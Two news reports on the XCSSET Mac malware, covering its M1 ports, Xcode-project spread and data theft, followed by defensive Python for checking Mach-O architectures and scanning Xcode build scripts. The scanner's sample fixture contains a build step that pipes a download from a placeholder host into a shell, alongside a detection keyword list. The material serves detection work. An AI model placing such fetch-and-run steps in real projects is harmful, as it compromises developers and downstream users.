Mac Malware 'XCSSET' Adapted for Devices With M1 Chips


mood


An increasing number of Mac malware developers have started creating variants that are specifically designed to run on devices powered by Apple’s M1 chip.

Apple unveiled its M1 system-on-chip in November 2020 and the first malware created specifically for systems with the arm64 CPU architecture used by the M1 was apparently created in December. This was a variant of Pirrit, a piece of adware that has been around for several years.

A few days after the existence of this Pirrit variant came to light, managed detection and response firm Red Canary reported identifying a mysterious piece of Mac malware that had infected tens of thousands of devices around the world. This malware, named Silver Sparrow, also had a variant specifically designed for M1 systems.

Kaspersky reported on Friday that it too has spotted a piece of malware with a variant compiled for devices with M1 chips, specifically a variant of the malware known as XCSSET.

XCSSET is a mysterious piece of malware first detailed by Trend Micro and Mac security company Intego in August 2020. It does not appear to have been linked to any known threat group or activity, but a majority of infections spotted at the time were in China and India.

The malware is designed to allow its operator to launch ransomware attacks (i.e. encrypt files and display a ransom note), and steal information from infected devices, including data associated with the Evernote, Skype, Notes, QQ, WeChat, and Telegram apps.

It can also launch universal cross-site scripting (UXSS) attacks in an effort to inject arbitrary JavaScript code into the websites visited by the victim. This allows it to modify sites, including replacing cryptocurrency addresses, and phish credentials and payment card information.

XCSSET spreads through code injected into projects for Xcode, Apple’s integrated development environment. The payload is executed when the project is built.

Kaspersky has seen an XCSSET sample compiled for the arm64 architecture. This sample was uploaded to the VirusTotal malware analysis service on February 24, which has led the company’s researchers to believe that the campaign is likely still ongoing.

Kaspersky noted that in many cases Mac malware is delivered in the Mach-O format, which includes the malicious code compiled for several architectures — depending on what type of device the malware lands on, the code corresponding to that architecture is executed.

“With the new M1 chip, Apple has certainly pushed its performance and energy saving limits on Mac computers, but malware developers kept an eye on those innovations and quickly adapted their executables to Apple Silicon by porting the code to the ARM64 architecture,” Kaspersky researchers wrote in a blog post.

They added, “We have observed various attempts to port executables not just among typical adware such as Pirrit or Bnodlero samples, but also among malicious packages, such as the Silver Sparrow threat and XCSSET downloadable malicious modules. This certainly will give a kickstart to other malware adversaries to begin adapting their code for running on Apple M1 chips.”

Source: Mac Malware 'XCSSET' Adapted for Devices With M1 Chips
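The article above notes that Mac malware is often shipped as a Mach-O universal ("fat") binary carrying one code slice per architecture, and that the M1-era samples add a native arm64 slice. The following added example (not code from the article, Kaspersky, or the malware) parses the fat and thin Mach-O headers to list the architectures a file was compiled for, so an analyst can triage whether a sample carries an arm64 slice; the sample headers are constructed, and the cputype constants come from the Mach-O ABI.

```python
import struct

FAT_MAGIC = 0xCAFEBABE        # universal (fat) binary; header is big-endian
MH_MAGIC_64 = 0xFEEDFACF      # 64-bit thin Mach-O; header is in the file's native byte order
CPU_ARCH_ABI64 = 0x01000000
CPU_NAMES = {
    7 | CPU_ARCH_ABI64: "x86_64",   # CPU_TYPE_X86 with the 64-bit flag
    12 | CPU_ARCH_ABI64: "arm64",   # CPU_TYPE_ARM with the 64-bit flag
    7: "i386",
    12: "arm",
}

def mach_o_architectures(data: bytes) -> list:
    """List the CPU architectures a thin or fat Mach-O image was compiled for."""
    if len(data) < 8:
        raise ValueError("too short to be a Mach-O header")
    if struct.unpack(">I", data[:4])[0] == FAT_MAGIC:
        # fat_header: magic, nfat_arch; then nfat_arch entries of
        # fat_arch {cputype, cpusubtype, offset, size, align}, all big-endian
        nfat = struct.unpack(">I", data[4:8])[0]
        if nfat > 32 or len(data) < 8 + nfat * 20:
            raise ValueError("implausible fat header (Java class files share this magic)")
        archs = []
        for i in range(nfat):
            cputype = struct.unpack(">I", data[8 + i * 20:12 + i * 20])[0]
            archs.append(CPU_NAMES.get(cputype, "unknown(0x%08x)" % cputype))
        return archs
    # Thin image: x86_64 and arm64 Mach-O headers are little-endian, so read them that way.
    magic, cputype = struct.unpack("<II", data[:8])
    if magic != MH_MAGIC_64:
        raise ValueError("unsupported magic 0x%08x" % magic)
    return [CPU_NAMES.get(cputype, "unknown(0x%08x)" % cputype)]

def has_native_arm64(data: bytes) -> bool:
    """True when the image carries an arm64 slice, i.e. it runs natively on M1 Macs."""
    return "arm64" in mach_o_architectures(data)

# Constructed headers (not real samples): a fat binary with x86_64 + arm64 slices,
# and a thin x86_64-only image. Offsets, sizes and subtypes are dummy values.
SAMPLE_FAT = struct.pack(">II", FAT_MAGIC, 2) \
    + struct.pack(">IIIII", 7 | CPU_ARCH_ABI64, 3, 0x4000, 0x100, 14) \
    + struct.pack(">IIIII", 12 | CPU_ARCH_ABI64, 0, 0x8000, 0x100, 14)
SAMPLE_THIN_X86 = struct.pack("<II", MH_MAGIC_64, 7 | CPU_ARCH_ABI64) + b"\0" * 24

if __name__ == "__main__":
    for label, blob in (("fat", SAMPLE_FAT), ("thin", SAMPLE_THIN_X86)):
        print(label, mach_o_architectures(blob), "native arm64:", has_native_arm64(blob))
```

Run it against the first 8 + 20 * n bytes of a real file to see which slices it carries; the 64-bit fat format (magic 0xCAFEBABF) is not handled here.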

Malware Spreads Via Xcode Projects Now Targeting Apple's M1-based Macs

A Mac malware campaign targeting Xcode developers has been retooled to add support for Apple's new M1 chips and expand its features to steal confidential information from cryptocurrency apps.

XCSSET came into the spotlight in August 2020 after it was found to spread via modified Xcode IDE projects, which, upon building, were configured to execute the payload. The malware repackages payload modules to imitate legitimate Mac apps, which are ultimately responsible for infecting local Xcode projects and injecting the main payload to execute when the compromised project builds.

XCSSET modules come with the capabilities to steal credentials, capture screenshots, inject malicious JavaScript into websites, plunder user data from different apps, and even encrypt files for a ransom.

Then in March 2021, Kaspersky researchers uncovered XCSSET samples compiled for the new Apple M1 chips, suggesting that the malware campaign was not only ongoing but also that adversaries are actively adapting their executables and porting them to run on new Apple Silicon Macs natively.

The latest research by Trend Micro shows that XCSSET continues to abuse the development version of the Safari browser to plant JavaScript backdoors onto websites via Universal Cross-site Scripting (UXSS) attacks.

"It hosts Safari update packages in the [command-and-control] server, then downloads and installs packages for the user's OS version," Trend Micro researchers said in an analysis published on Friday. "To adapt to the newly-released Big Sur, new packages for 'Safari 14' were added."

In addition to trojanizing Safari to exfiltrate data, the malware is also known for exploiting the remote debugging mode in other browsers such as Google Chrome, Brave, Microsoft Edge, Mozilla Firefox, Opera, Qihoo 360 Browser, and Yandex Browser to carry out UXSS attacks.

What's more, the malware now even attempts to steal account information from multiple websites, including cryptocurrency trading platforms Huobi, Binance, NNCall.net, Envato, and 163.com, with abilities to replace the address in a user's cryptocurrency wallet with those under the attacker's control.

XCSSET's mode of distribution via doctored Xcode projects poses a serious threat, as affected developers who unwittingly share their work on GitHub could pass on the malware to their users in the form of the compromised Xcode projects, leading to "a supply-chain-like attack for users who rely on these repositories as dependencies in their own projects."

Source: Malware Spreads Via Xcode Projects Now Targeting Apple's M1-based Macs
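Both posts describe XCSSET's distribution mechanism as code injected into Xcode projects that runs when the project is built, which makes shared repositories a supply-chain risk. The following added example (not code from either article or from Trend Micro) is a defender-side check that enumerates the Run Script build phases in a project's project.pbxproj and flags scripts that fetch or decode code at build time; it assumes such phases are where build-time code lives in a pbxproj, the indicator list is this example's heuristic rather than a published XCSSET signature, and the pbxproj fragment is constructed.

```python
import re

# One PBXShellScriptBuildPhase object runs from its "isa" line to the first "};"
PHASE_RE = re.compile(r"isa = PBXShellScriptBuildPhase;(.*?)\};", re.S)
NAME_RE = re.compile(r'name = "?([^";]+)"?;')
SCRIPT_RE = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";', re.S)

# Heuristic indicators (this example's assumption, not a published XCSSET signature)
INDICATORS = ("curl ", "wget ", "base64", "osascript", "eval ", "| sh", "| bash", "python -c")

def find_shell_script_phases(pbxproj: str) -> list:
    """Return every Run Script phase as {name, script, indicators} for review."""
    phases = []
    for m in PHASE_RE.finditer(pbxproj):
        body = m.group(1)
        name_m = NAME_RE.search(body)
        script_m = SCRIPT_RE.search(body)
        # pbxproj strings use C-style escapes (\n, \", \\); decode them to real text
        script = script_m.group(1).encode("utf-8").decode("unicode_escape") if script_m else ""
        phases.append({
            "name": name_m.group(1) if name_m else "(unnamed)",
            "script": script,
            "indicators": [i for i in INDICATORS if i in script],
        })
    return phases

def suspicious_phases(pbxproj: str) -> list:
    """Names of script phases that hit at least one indicator."""
    return [p["name"] for p in find_shell_script_phases(pbxproj) if p["indicators"]]

# Constructed project.pbxproj fragment (not from a real project): one ordinary
# lint step and one step that pipes a download into a shell.
SAMPLE_PBXPROJ = r'''
		AA01 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			files = (
			);
			name = "Lint";
			shellPath = /bin/sh;
			shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
		};
		AA02 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			name = "Run Script";
			shellPath = /bin/sh;
			shellScript = "curl -s http://placeholder.invalid/stage | sh\n";
		};
'''
```

Review every flagged phase in a cloned project before building it, since Xcode runs these scripts with the developer's privileges as part of a normal build.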
